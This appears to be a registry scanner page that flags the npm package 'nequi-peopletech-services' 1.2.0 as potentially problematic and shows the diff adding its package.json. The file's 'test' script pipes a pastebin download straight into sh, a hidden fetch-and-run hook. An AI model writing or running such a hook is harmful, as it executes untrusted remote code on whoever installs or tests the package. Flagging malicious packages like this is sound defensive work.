nequi-peopletech-services 1.2.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of nequi-peopletech-services might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +14 -0
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "nequi-peopletech-services",
3
+ "version": "1.2.0",
4
+ "description": "Fluidtest",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "curl -s curl -s https://pastebin.com/raw/yxvXmAQG | sh"
8
+ },
9
+ "author": "rmachado",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "user": "^0.0.0"
13
+ }
14
+ }